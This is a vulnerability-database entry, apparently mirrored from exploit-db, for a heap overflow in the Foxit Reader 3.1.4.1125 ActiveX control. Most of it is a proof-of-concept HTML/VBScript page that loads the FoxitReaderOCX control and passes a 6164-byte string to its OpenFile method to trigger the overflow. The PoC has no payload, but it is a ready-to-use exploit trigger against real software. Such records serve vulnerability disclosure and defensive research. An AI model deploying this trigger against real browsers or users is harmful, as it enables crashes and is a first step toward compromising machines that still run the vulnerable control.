Foxit Reader 3.1.4.1125 - ActiveX Heap Overflow (PoC)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1059052 漏洞类型
发布时间 2010-01-19 更新时间 2010-01-19
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/11196
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#Vendor :www.foxitsoftware.com
#tested on :[windows 7]
#Foxit Reader Version 3.1.4.1125

<html>
<object classid='clsid:05563215-225C-45EB-BB34-AFA47217B1DE' id='target' ></object>
<script language='vbscript'>

targetFile = "C:\Program Files\Foxit Software\Foxit Reader\plugins\FoxitReaderOCX.ocx"
prototype  = "Function OpenFile ( ByVal strFilePath As String ) As Boolean"
memberName = "OpenFile"
progid     = "FOXITREADEROCXLib.FoxitReaderOCX"
argCount   = 1
 
arg1=String(6164, "A")
 
target.OpenFile arg1 
 
</script>